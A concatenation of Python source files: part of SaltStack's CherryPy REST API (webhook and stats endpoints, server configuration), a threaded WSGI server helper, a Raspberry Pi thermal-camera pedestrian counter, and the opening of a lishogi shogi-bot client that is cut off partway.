SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor <reactor>`
"""
exposed = True
tag_base = ["salt", "netapi", "hook"]
_cp_config = dict(
LowDataAdapter._cp_config,
**{
# Don't do any lowdata processing on the POST data
"tools.lowdata_fmt.on": True,
# Auth can be overridden in __init__().
"tools.salt_auth.on": True,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.event = salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
opts=self.opts,
listen=False,
)
if cherrypy.config["apiopts"].get("webhook_disable_auth"):
self._cp_config["tools.salt_auth.on"] = False
def POST(self, *args, **kwargs):
"""
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook \\
-H 'Content-type: application/json' \\
-d '{"foo": "Foo!", "bar": "Bar!"}'
.. code-block:: text
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/json
{"foo": "Foo!", "bar": "Bar!"}
**Example response**:
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: jinja
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
revision: {{ revision }}
{% endif %}
"""
tag = "/".join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
if not data:
data = {}
raw_body = getattr(cherrypy.serving.request, "raw_body", "")
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event(
{"body": raw_body, "post": data, "headers": headers}, tag
)
return {"success": ret}
class Stats:
"""
Expose statistics on the running CherryPy server
"""
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def __init__(self):
if cherrypy.config["apiopts"].get("stats_disable_auth"):
self._cp_config["tools.salt_auth.on"] = False
def GET(self):
"""
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
"""
if hasattr(logging, "statistics"):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App:
"""
Class to serve HTML5 apps
"""
exposed = True
def GET(self, *args):
"""
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http:get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
"""
apiopts = cherrypy.config["apiopts"]
default_index = os.path.abspath(
os.path.join(os.path.dirname(__file__), "index.html")
)
return cherrypy.lib.static.serve_file(apiopts.get("app", default_index))
class API:
"""
Collect configuration and URL map for building the CherryPy app
"""
url_map = {
"index": LowDataAdapter,
"login": Login,
"logout": Logout,
"token": Token,
"minions": Minions,
"run": Run,
"jobs": Jobs,
"keys": Keys,
"events": Events,
"stats": Stats,
}
def _setattr_url_map(self):
"""
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
"""
if self.apiopts.get("enable_sessions", True) is False:
url_blacklist = ["login", "logout", "minions", "jobs"]
else:
url_blacklist = []
urls = (
(url, cls) for url, cls in self.url_map.items() if url not in url_blacklist
)
for url, cls in urls:
setattr(self, url, cls())
def _update_url_map(self):
"""
Assemble any dynamic or configurable URLs
"""
if HAS_WEBSOCKETS:
self.url_map.update({"ws": WebsocketEndpoint})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update(
{self.apiopts.get("webhook_url", "hook").lstrip("/"): Webhook}
)
# Enable the single-page JS app URL.
self.url_map.update({self.apiopts.get("app_path", "app").lstrip("/"): App})
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.apiopts = cherrypy.config["apiopts"]
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
"""
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
"""
conf = {
"global": {
"server.socket_host": self.apiopts.get("host", "0.0.0.0"),
"server.socket_port": self.apiopts.get("port", 8000),
"server.thread_pool": self.apiopts.get("thread_pool", 100),
"server.socket_queue_size": self.apiopts.get("queue_size", 30),
"max_request_body_size": self.apiopts.get(
"max_request_body_size", 1048576
),
"debug": self.apiopts.get("debug", False),
"log.access_file": self.apiopts.get("log_access_file", ""),
"log.error_file": self.apiopts.get("log_error_file", ""),
},
"/": {
"request.dispatch": cherrypy.dispatch.MethodDispatcher(),
"tools.trailing_slash.on": True,
"tools.gzip.on": True,
"tools.html_override.on": True,
"tools.cors_tool.on": True,
},
}
if salt.utils.versions.version_cmp(cherrypy.__version__, "12.0.0") < 0:
# CherryPy >= 12.0 no longer supports "timeout_monitor", only set
# this config option when using an older version of CherryPy.
# See Issue #44601 for more information.
conf["global"]["engine.timeout_monitor.on"] = self.apiopts.get(
"expire_responses", True
)
if cpstats and self.apiopts.get("collect_stats", False):
conf["/"]["tools.cpstats.on"] = True
if "favicon" in self.apiopts:
conf["/favicon.ico"] = {
"tools.staticfile.on": True,
"tools.staticfile.filename": self.apiopts["favicon"],
}
if self.apiopts.get("debug", False) is False:
conf["global"]["environment"] = "production"
# Serve static media if the directory has been set in the configuration
if "static" in self.apiopts:
conf[self.apiopts.get("static_path", "/static")] = {
"tools.staticdir.on": True,
"tools.staticdir.dir": self.apiopts["static"],
}
# Add to global config
cherrypy.config.update(conf["global"])
return conf
def get_app(opts):
"""
Returns a WSGI app and a configuration dictionary
"""
apiopts = opts.get(__name__.rsplit(".", 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config["saltopts"] = opts
cherrypy.config["apiopts"] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
|
_background_server.py | # Note: the code in this file is adapted from source at
# https://github.com/googlecolab/colabtools/blob/master/google/colab/html/_background_server.py
# The following is its original license:
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""WSGI server utilities to run in thread. WSGI chosen for easier interop."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import six
import socket
import threading
import wsgiref.simple_server
import portpicker
def _set_new_event_loop():
if not six.PY2:
import asyncio
asyncio.set_event_loop(asyncio.new_event_loop())
def _build_server(started, stopped, stopping, timeout):
"""Closure to build the server function to be passed to the thread.
Args:
started: Threading event to notify when started.
stopped: Threading event to notify when stopped.
stopping: Threading event to notify when stopping.
timeout: Http timeout in seconds.
Returns:
A function that function that takes a port and WSGI app and notifies
about its status via the threading events provided.
"""
def server(port, wsgi_app):
"""Serve a WSGI application until stopped.
Args:
port: Port number to serve on.
wsgi_app: WSGI application to serve.
"""
host = '' # Bind to all.
try:
httpd = wsgiref.simple_server.make_server(
host, port, wsgi_app, handler_class=SilentWSGIRequestHandler)
except socket.error:
# Try IPv6
httpd = wsgiref.simple_server.make_server(
host,
port,
wsgi_app,
server_class=_WSGIServerIPv6,
handler_class=SilentWSGIRequestHandler)
_set_new_event_loop()
started.set()
httpd.timeout = timeout
while not stopping.is_set():
httpd.handle_request()
stopped.set()
return server
class SilentWSGIRequestHandler(wsgiref.simple_server.WSGIRequestHandler):
"""WSGIRequestHandler that generates no logging output."""
def log_message(self, format, *args): # pylint: disable=redefined-builtin
pass
class _WSGIServerIPv6(wsgiref.simple_server.WSGIServer):
"""IPv6 based extension of the simple WSGIServer."""
address_family = socket.AF_INET6
class _WsgiServer(object):
"""Wsgi server."""
def __init__(self, wsgi_app):
"""Initialize the WsgiServer.
Args:
wsgi_app: WSGI pep-333 application to run.
"""
self._app = wsgi_app
self._server_thread = None
# Threading.Event objects used to communicate about the status
# of the server running in the background thread.
# These will be initialized after building the server.
self._stopped = None
self._stopping = None
@property
def wsgi_app(self):
"""Returns the wsgi app instance."""
return self._app
@property
def port(self):
"""Returns the current port or error if the server is not started.
Raises:
RuntimeError: If server has not been started yet.
Returns:
The port being used by the server.
"""
if self._server_thread is None:
raise RuntimeError('Server not running.')
return self._port
def stop(self):
"""Stops the server thread."""
if self._server_thread is None:
return
self._stopping.set()
self._server_thread = None
self._stopped.wait()
def start(self, port=None, timeout=1):
"""Starts a server in a thread using the WSGI application provided.
Will wait until the thread has started calling with an already serving
application will simple return.
Args:
port: Number of the port to use for the application, will find an open
port if one is not provided.
timeout: Http timeout in seconds.
"""
if self._server_thread is not None:
return
started = threading.Event()
self._stopped = threading.Event()
self._stopping = threading.Event()
wsgi_app = self.wsgi_app
server = _build_server(started, self._stopped, self._stopping, timeout)
if port is None:
self._port = portpicker.pick_unused_port()
else:
self._port = port
server_thread = threading.Thread(target=server, args=(self._port, wsgi_app))
self._server_thread = server_thread
server_thread.start()
started.wait()
|
thermal_save_csv.py | import pygame
import os
import math
import datetime
from datetime import datetime, date
import time
import numpy as np
from scipy.interpolate import griddata
from scipy import stats
import cv2
from colour import Color
from CentroidTracker import CentroidTracker
from multiprocessing import Process, active_children
import pexpect
import busio
import board
import adafruit_amg88xx
import functools
from functools import cmp_to_key
import json
import argparse
import csv
import threading
from trackableobject import TrackableObject
# some utility functions
def constrain(val, min_val, max_val):
return min(max_val, max(min_val, val))
def map_value(x, in_min, in_max, out_min, out_max):
return (x - in_min) * (out_max - out_min) / (in_max - in_min) + out_min
def get_filepath(relative_filepath):
# function to get the absolute filepath of the file you pass in
dir = os.path.dirname('/home/pi/git/pedestrian-counter/data/')
filename = os.path.join(dir, relative_filepath)
return filename
def csv_save_append(list):
datapath = str(get_filepath('../data/') + 'data.csv')
with open(datapath, 'a') as f:
writer = csv.writer(f)
writer.writerow(list)
def csv_save(delay):
global payload
while True:
for child in active_children():
if child.name == 'csv_proc':
child.terminate()
proc = Process(
target=csv_save_append, name='csv_proc', args=(payload, ))
proc.start()
print("Saved to CSV.")
time.sleep(delay)
def count_within_range(list1, l, r):
'''
Helper function to count how many numbers in list1 falls into range [l,r]
'''
c = 0
# traverse in the list1
for x in list1:
# condition check
if x >= l and x <= r:
c += 1
return c
timestart = str(datetime.now().isoformat())
payload = [str(datetime.now().isoformat()), timestart, 0, 0]
def main():
global payload
global timestart
# argument parsing
parser = argparse.ArgumentParser()
parser.add_argument(
'--headless', help='run the pygame headlessly', action='store_true')
parser.add_argument(
"--color_depth", help="integer number of colors to use to draw temps", type=int)
parser.add_argument(
'--max_temp', help='initial max temperature', type=int)
parser.add_argument(
'--ambient_offset', help='value to offset ambient temperature by to get rolling MAXTEMP', type=int)
parser.add_argument(
'--ambient_time', help='length of ambient temperature collecting intervals in seconds', type=int)
parser.add_argument(
'--blob_min_threshold', help='blod detection min threshold', type=int)
parser.add_argument(
'--blob_max_threshold', help='blod detection min threshold', type=int)
parser.add_argument(
'--blob_filterbyarea', help='blod detection filter by area', action='store_true')
parser.add_argument(
'--blob_min_area', help='blod detection filter by area min area', type=int)
parser.add_argument(
'--blob_filterbycircularity', help='blod detection filter by circularity', action='store_true')
parser.add_argument(
'--blob_min_circularity', help='blod detection filter by circularity min circularity', type=float)
parser.add_argument(
'--blob_filterbyconvexity', help='blod detection filter by convexity', action='store_true')
parser.add_argument(
'--blob_min_convexity', help='blod detection filter by convexity min convexity', type=float)
parser.add_argument(
'--blob_filterbyinertia', help='blod detection filter by inertia', action='store_true')
parser.add_argument(
'--blob_min_inertiaratio', help='blod detection filter by inertia inertia ratio', type=float)
parser.add_argument(
'--csv_save_interval', help='csv file saving interval in seconds', type=int)
args = parser.parse_args()
print(args)
COLOR_DEPTH = args.color_depth
MAX_TEMP = args.max_temp
AMBIENT_OFFSET = args.ambient_offset
AMBIENT_TIME = args.ambient_time
BLOB_MIN_THRESHOLD = args.blob_min_threshold
BLOB_MAX_THRESHOLD = args.blob_max_threshold
BLOB_FILTERBYAREA = args.blob_filterbyarea
BLOB_MIN_AREA = args.blob_min_area
BLOB_FILTERBYCIRCULARITY = args.blob_filterbycircularity
BLOB_MIN_CIRCULARITY = args.blob_min_circularity
BLOB_FILTERBYCONVEXITY = args.blob_filterbyconvexity
BLOB_MIN_CONVEXITY = args.blob_min_convexity
BLOB_FILTERBYINERTIA = args.blob_filterbyinertia
BLOB_MIN_INERTIARATIO = args.blob_min_inertiaratio
CSV_SAVE_INTERVAL = args.csv_save_interval
# create data folders if they don't exist
if not os.path.exists(get_filepath('../data')):
os.makedirs(get_filepath('../data'))
i2c_bus = busio.I2C(board.SCL, board.SDA)
# For headless pygame
if args.headless:
print("App understands we are running headless.")
os.environ['SDL_VIDEODRIVER'] = 'dummy'
os.putenv('SDL_VIDEODRIVER', 'dummy')
else:
os.putenv('SDL_FBDEV', '/dev/fb1')
pygame.init()
# initialize the sensor
sensor = adafruit_amg88xx.AMG88XX(i2c_bus)
points = [(math.floor(ix / 8), (ix % 8)) for ix in range(0, 64)]
grid_x, grid_y = np.mgrid[0:7:32j, 0:7:32j]
# sensor is an 8x8 grid so lets do a square
height = 240
width = 240
# height = 480
# width = 480
# the list of colors we can choose from
black = Color("black")
colors = list(black.range_to(Color("white"), COLOR_DEPTH))
# create the array of colors
colors = [(int(c.red * 255), int(c.green * 255), int(c.blue * 255))
for c in colors]
displayPixelWidth = width / 30
displayPixelHeight = height / 30
lcd = pygame.display.set_mode((width, height))
lcd.fill((255, 0, 0))
pygame.display.update()
pygame.mouse.set_visible(False)
lcd.fill((0, 0, 0))
pygame.display.update()
# Setup SimpleBlobDetector parameters.
params = cv2.SimpleBlobDetector_Params()
# Change thresholds
if BLOB_MIN_THRESHOLD:
params.minThreshold = BLOB_MIN_THRESHOLD
if BLOB_MAX_THRESHOLD:
params.maxThreshold = BLOB_MAX_THRESHOLD
# Filter by Area.
if BLOB_FILTERBYAREA:
params.filterByArea = BLOB_FILTERBYAREA
params.minArea = BLOB_MIN_AREA
# Filter by Circularity
if BLOB_FILTERBYCIRCULARITY:
params.filterByCircularity = BLOB_FILTERBYCIRCULARITY
params.minCircularity = BLOB_MIN_CIRCULARITY
# Filter by Convexity
if BLOB_FILTERBYCONVEXITY:
params.filterByConvexity = BLOB_FILTERBYCONVEXITY
params.minConvexity = BLOB_MIN_CONVEXITY
# Filter by Inertia
if BLOB_FILTERBYINERTIA:
params.filterByInertia = BLOB_FILTERBYINERTIA
params.minInertiaRatio = BLOB_MIN_INERTIARATIO
# Set up the detector with default parameters.
detector = cv2.SimpleBlobDetector_create(params)
# initialize centroid tracker
ct = CentroidTracker()
# a dictionary to map each unique object ID to a TrackableObject
trackableObjects = {}
# the total number of objects that have moved either up or down
total_down = 0
total_up = 0
total_down_old = 0
total_up_old = 0
# let the sensor initialize
time.sleep(.1)
# press key to exit
screencap = True
# array to hold mode of last 10 minutes of temperatures
mode_list = []
# thread for saving data
save_thread = threading.Thread(
target=csv_save, args=(CSV_SAVE_INTERVAL,))
save_thread.start()
print('sensor started!')
while(screencap):
start = time.time()
# read the pixels
pixels = []
for row in sensor.pixels:
pixels = pixels + row
#print(ct)
# payload = [str(datetime.now().isoformat()),
# ct.get_count(), total_up, total_down]
payload = [str(datetime.now().isoformat()),
timestart, total_up, total_down]
mode_result = stats.mode([round(p) for p in pixels])
mode_list.append(int(mode_result[0]))
# instead of taking the ambient temperature over one frame of data take it over a set amount of time
MAX_TEMP = float(np.mean(mode_list)) + AMBIENT_OFFSET
pixels = [map_value(p, np.mean(mode_list) + 1, MAX_TEMP, 0,
COLOR_DEPTH - 1) for p in pixels]
# perform interpolation
bicubic = griddata(points, pixels, (grid_x, grid_y), method='cubic')
# draw everything
for ix, row in enumerate(bicubic):
for jx, pixel in enumerate(row):
try:
pygame.draw.rect(lcd, colors[constrain(int(pixel), 0, COLOR_DEPTH - 1)],
(displayPixelHeight * ix, displayPixelWidth * jx, displayPixelHeight, displayPixelWidth))
except:
print("Caught drawing error")
surface = pygame.display.get_surface()
myfont = pygame.font.SysFont("comicsansms", 25)
img = pygame.surfarray.array3d(surface)
img = np.swapaxes(img, 0, 1)
# Read image
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
img_not = cv2.bitwise_not(img)
# Detect blobs.
keypoints = detector.detect(img_not)
img_with_keypoints = cv2.drawKeypoints(img, keypoints, np.array(
[]), (0, 0, 255), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)
# draw a horizontal line in the center of the frame -- once an
# object crosses this line we will determine whether they were
# moving 'up' or 'down'
pygame.draw.line(lcd, (255, 255, 255),
(0, height // 2), (width, height // 2), 2)
pygame.display.update()
for i in range(0, len(keypoints)):
x = keypoints[i].pt[0]
y = keypoints[i].pt[1]
# print circle around blob
pygame.draw.circle(lcd, (200, 0, 0), (int(
x), int(y)), round(keypoints[i].size), 2)
# update our centroid tracker using the detected centroids
objects = ct.update(keypoints)
# loop over the tracked objects
for (objectID, centroid) in objects.items():
# check to see if a trackable object exists for the current
# object ID
to = trackableObjects.get(objectID, None)
# if there is no existing trackable object, create one
if to is None:
to = TrackableObject(objectID, centroid)
# otherwise, there is a trackable object so we can utilize it
# to determine direction
else:
# the difference between the y-coordinate of the *current*
# centroid and the mean of *previous* centroids will tell
# us in which direction the object is moving (negative for
# 'up' and positive for 'down')
y = [c[1] for c in to.centroids]
direction = centroid[1] - np.mean(y)
to.centroids.append(centroid)
# check to see if the object has been counted or not
if not to.counted:
# if the direction is negative (indicating the object
# is moving up) AND the centroid is above the center
# line, count the object
# the historical centroid must present in the lower half of the screen
if direction < 0 and centroid[1] < height // 2 and count_within_range(y, height//2, height) > 0:
total_up += 1
to.counted = True
# if the direction is positive (indicating the object
# is moving down) AND the centroid is below the
# center line, count the object
# the historical centroid must present in the upper half of the screen
elif direction > 0 and centroid[1] > height // 2 and count_within_range(y, 0, height//2) > 0:
total_down += 1
to.counted = True
# store the trackable object in our dictionary
trackableObjects[objectID] = to
# update counter in top left
textsurface1 = myfont.render(
"IN: "+str(total_up), False, (255, 255, 255))
textsurface2 = myfont.render(
'OUT: '+str(total_down), False, (255, 255, 255))
lcd.blit(textsurface1, (0, 0))
lcd.blit(textsurface2, (0, 25))
total_up_old = total_up
total_down_old = total_down
pygame.display.update()
for event in pygame.event.get():
if event.type == pygame.KEYDOWN:
print('terminating...')
screencap = False
break
# for running the save on for a certain amount of time
# if time.time() - start_time >= 10:
# print('terminating...')
# screencap = False
# empty mode_list every AMBIENT_TIME seconds
if len(mode_list) > AMBIENT_TIME:
mode_list = []
time.sleep(max(1./25 - (time.time() - start), 0))
# Release everything if job is finished
cv2.destroyAllWindows()
if __name__ == "__main__":
main()
|
lishogi-bot.py | import argparse
import shogi
import engine_wrapper
import model
import json
import lishogi
import logging
import multiprocessing
import traceback
import logging_pool
import signal
import sys
import time
import backoff
import threading
from config import load_config
from conversation import Conversation, ChatLine
from functools import partial
from requests.exceptions import ChunkedEncodingError, ConnectionError, HTTPError, ReadTimeout
from urllib3.exceptions import ProtocolError
from ColorLogger import enable_color_logging
from util import *
import copy
logger = logging.getLogger(__name__)
try:
from http.client import RemoteDisconnected
# New in version 3.5: Previously, BadStatusLine('') was raised.
except ImportError:
from http.client import BadStatusLine as RemoteDisconnected
__version__ = "0.7.0"
terminated = False
def signal_handler(signal, frame):
global terminated
logger.debug("Recieved SIGINT. Terminating client.")
terminated = True
signal.signal(signal.SIGINT, signal_handler)
def is_final(exception):
return isinstance(exception, HTTPError) and exception.response.status_code < 500
def upgrade_account(li):
if li.upgrade_to_bot_account() is None:
return False
logger.info("Succesfully upgraded to Bot Account!")
return True
def watch_control_stream(control_queue, li):
while not terminated:
try:
response = li.get_event_stream()
lines = response.iter_lines()
for line in lines:
if line:
event = json.loads(line.decode('utf-8'))
control_queue.put_nowait(event)
else:
control_queue.put_nowait({"type": "ping"})
except:
pass
def start(li, user_profile, engine_factory, config):
challenge_config = config["challenge"]
max_games = challenge_config.get("concurrency", 1)
logger.info("You're now connected to {} and awaiting challenges.".format(config["url"]))
manager = multiprocessing.Manager()
challenge_queue = manager.list()
control_queue = manager.Queue()
control_stream = multiprocessing.Process(target=watch_control_stream, args=[control_queue, li])
control_stream.start()
busy_processes = 0
queued_processes = 0
with logging_pool.LoggingPool(max_games+1) as pool:
while not terminated:
event = control_queue.get()
if event["type"] == "terminated":
break
elif event["type"] == "local_game_done":
busy_processes -= 1
logger.info("+++ Process Free. Total Queued: {}. Total Used: {}".format(queued_processes, busy_processes))
elif event["type"] == "challenge":
chlng = model.Challenge(event["challenge"])
if chlng.is_supported(challenge_config):
challenge_queue.append(chlng)
if (challenge_config.get("sort_by", "best") == "best"):
list_c = list(challenge_queue)
list_c.sort(key=lambda c: -c.score())
challenge_queue = list_c
else:
try:
li.decline_challenge(chlng.id)
logger.info(" Decline {}".format(chlng))
except:
pass
elif event["type"] == "gameStart":
if queued_processes <= 0:
logger.debug("Something went wrong. Game is starting and we don't have a queued process")
else:
queued_processes -= 1
busy_processes += 1
logger.info("--- Process Used. Total Queued: {}. Total Used: {}".format(queued_processes, busy_processes))
game_id = event["game"]["id"]
pool.apply_async(play_game, [li, game_id, control_queue, engine_factory, user_profile, config, challenge_queue])
while ((queued_processes + busy_processes) < max_games and challenge_queue): # keep processing the queue until empty or max_games is reached
chlng = challenge_queue.pop(0)
try:
logger.info(" Accept {}".format(chlng))
queued_processes += 1
response = li.accept_challenge(chlng.id)
logger.info("--- Process Queue. Total Queued: {}. Total Used: {}".format(queued_processes, busy_processes))
except (HTTPError, ReadTimeout) as exception:
if isinstance(exception, HTTPError) and exception.response.status_code == 404: # ignore missing challenge
logger.info(" Skip missing {}".format(chlng))
queued_processes -= 1
control_queue.task_done()
logger.info("Terminated")
control_stream.terminate()
control_stream.join()
ponder_results = {}
@backoff.on_exception(backoff.expo, BaseException, max_time=600, giveup=is_final)
def play_game(li, game_id, control_queue, engine_factory, user_profile, config, challenge_queue):
response = li.get_game_stream(game_id)
lines = response.iter_lines()
#Initial response of stream will be the full game info. Store it
initial_state = json.loads(next(lines).decode('utf-8'))
game = model.Game(initial_state, user_profile["username"], li.baseUrl, config.get("abort_time", 20))
board = setup_board(game)
engine = engine_factory(board)
engine.get_opponent_info(game)
conversation = Conversation(game, engine, li, __version__, challenge_queue)
logger.info("+++ {}".format(game))
engine_cfg = config["engine"]
is_usi = engine_cfg["protocol"] == "usi"
is_usi_ponder = is_usi and engine_cfg.get("ponder", False)
move_overhead = config.get("move_overhead", 1000)
polyglot_cfg = engine_cfg.get("polyglot", {})
book_cfg = polyglot_cfg.get("book", {})
ponder_thread = None
deferredFirstMove = False
ponder_usi = None
def ponder_thread_func(game, engine, board, wtime, btime, winc, binc):
global ponder_results
best_move , ponder_move = engine.search_with_ponder(board, wtime, btime, winc, binc, True)
ponder_results[game.id] = ( best_move , ponder_move )
engine.set_time_control(game)
if len(board.move_stack) < 2:
while not terminated:
try:
if not play_first_move(game, engine, board, li):
deferredFirstMove = True
break
except (HTTPError) as exception:
if exception.response.status_code == 400: # fallthrough
break
else:
moves = game.state["moves"].split()
if not is_game_over(game) and is_engine_move(game, moves):
best_move = None
ponder_move = None
wtime = game.state["wtime"]
btime = game.state["btime"]
if board.turn == shogi.BLACK:
wtime = max(0, wtime - move_overhead)
else:
btime = max(0, btime - move_overhead)
logger.info("Searching for wtime {} btime {}".format(wtime, btime))
best_move , ponder_move = engine.search_with_ponder(board, wtime, btime, game.state["winc"], game.state["binc"])
engine.print_stats()
if is_usi_ponder and not ( ponder_move is None ):
ponder_board = copy.deepcopy(board)
ponder_board.push(shogi.Move.from_usi(best_move))
ponder_board.push(shogi.Move.from_usi(ponder_move))
ponder_usi = ponder_move
logger.info("Pondering for wtime {} btime {}".format(wtime, btime))
ponder_thread = threading.Thread(target = ponder_thread_func, args = (game, engine, ponder_board, wtime, btime, game.state["winc"], game.state["binc"]))
ponder_thread.start()
li.make_move(game.id, best_move)
while not terminated:
try:
binary_chunk = next(lines)
except(StopIteration):
break
try:
upd = json.loads(binary_chunk.decode('utf-8')) if binary_chunk else None
u_type = upd["type"] if upd else "ping"
if u_type == "chatLine":
conversation.react(ChatLine(upd), game)
elif u_type == "gameState":
game.state = upd
moves = upd["moves"].split()
if len(moves) > 0 and len(moves) != len(board.move_stack):
board = update_board(board, moves[-1])
if not is_game_over(game) and is_engine_move(game, moves):
if config.get("fake_think_time") and len(moves) > 9:
delay = min(game.clock_initial, game.my_remaining_seconds()) * 0.015
accel = 1 - max(0, min(100, len(moves) - 20)) / 150
sleep = min(5, delay * accel)
time.sleep(sleep)
best_move = None
ponder_move = None
wtime = upd["wtime"]
btime = upd["btime"]
if board.turn == shogi.BLACK:
wtime = max(0, wtime - move_overhead)
else:
btime = max(0, btime - move_overhead)
if not deferredFirstMove:
if best_move == None:
logger.info("Searching for wtime {} btime {}".format(wtime, btime))
best_move , ponder_move = engine.search_with_ponder(board, wtime, btime, upd["winc"], upd["binc"])
engine.print_stats()
if is_usi_ponder and not ( ponder_move is None ):
ponder_board = copy.deepcopy(board)
ponder_board.push(shogi.Move.from_usi(best_move))
ponder_board.push(shogi.Move.from_usi(ponder_move))
ponder_usi = ponder_move
logger.info("Pondering for wtime {} btime {}".format(wtime, btime))
ponder_thread = threading.Thread(target = ponder_thread_func, args = (game, engine, ponder_board, wtime, btime, upd["winc"], upd["binc"]))
ponder_thread.start()
li.make_move(game.id, best_move)
else:
play_first_move(game, engine, board, li)
deferredFirstMove = False
if board.turn == shogi.BLACK:
game.ping(config.get("abort_time", 20), (upd["wtime"] + upd["winc"]) / 1000 + 60)
else:
game.ping(config.get("abort_time", 20), (upd["btime"] + upd["binc"]) / 1000 + 60)
elif u_type == "ping":
if game.should_abort_now():
logger.info(" Aborting {} by lack of activity".format(game.url()))
li.abort(game.id)
break
elif game.should_terminate_now():
logger.info(" Terminating {} by lack of activity".format(game.url()))
if game.is_abortable():
li.abort(game.id)
break
except (HTTPError, ReadTimeout, RemoteDisconnected, ChunkedEncodingError, ConnectionError, ProtocolError) as e:
if game.id in (ongoing_game["gameId"] for ongoing_game in li.get_ongoing_games()):
continue
else:
break
logger.info("--- {} Game over".format(game.url()))
engine.stop()
if not ( ponder_thread is None ):
ponder_thread.join()
ponder_thread = None
# This can raise queue.NoFull, but that should only happen if we're not processing
# events fast enough and in this case I believe the exception should be raised
control_queue.put_nowait({"type": "local_game_done"})
def play_first_move(game, engine, board, li):
moves = game.state["moves"].split()
if is_engine_move(game, moves):
# need to hardcode first movetime since Lishogi has 30 sec limit.
best_move = engine.first_search(board, 1000)
engine.print_stats()
li.make_move(game.id, best_move)
return True
return False
def play_first_book_move(game, engine, board, li, config):
pass
def get_book_move(board, config):
pass
def setup_board(game):
if game.variant_name == "From Position":
board = shogi.Board(makesfenfromfen(game.initial_fen))
else:
board = shogi.Board() # Standard
moves = game.state["moves"].split()
for move in moves:
board = update_board(board, move)
return board
def is_white_to_move(game, moves):
return len(moves) % 2 == (0 if game.white_starts else 1)
def is_engine_move(game, moves):
return game.is_white == is_white_to_move(game, moves)
def is_game_over(game):
return game.state["status"] != "started"
def update_board(board, move):
usi_move = shogi.Move.from_usi(makeusi(move))
if board.is_legal(usi_move):
board.push(usi_move)
else:
logger.debug('Ignoring illegal move {} on board {}'.format(makeusi(move), board.sfen()))
return board
def intro():
return r"""
. _/\_
. //o o\\
. || || lishogi-bot %s
. || ||
. ||____|| Play on Lishogi with a bot
""" % __version__
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Play on Lishogi with a bot')
parser.add_argument('-u', action='store_true', help='Add this flag to upgrade your account to a bot account.')
parser.add_argument('-v', action='store_true', help='Verbose output. Changes log level from INFO to DEBUG.')
parser.add_argument('--config', help='Specify a configuration file (defaults to ./config.yml)')
parser.add_argument('-l', '--logfile', help="Log file to append logs to.", default=None)
args = parser.parse_args()
logging.basicConfig(level=logging.DEBUG if args.v else logging.INFO, filename=args.logfile,
format="%(asctime)-15s: %(message)s")
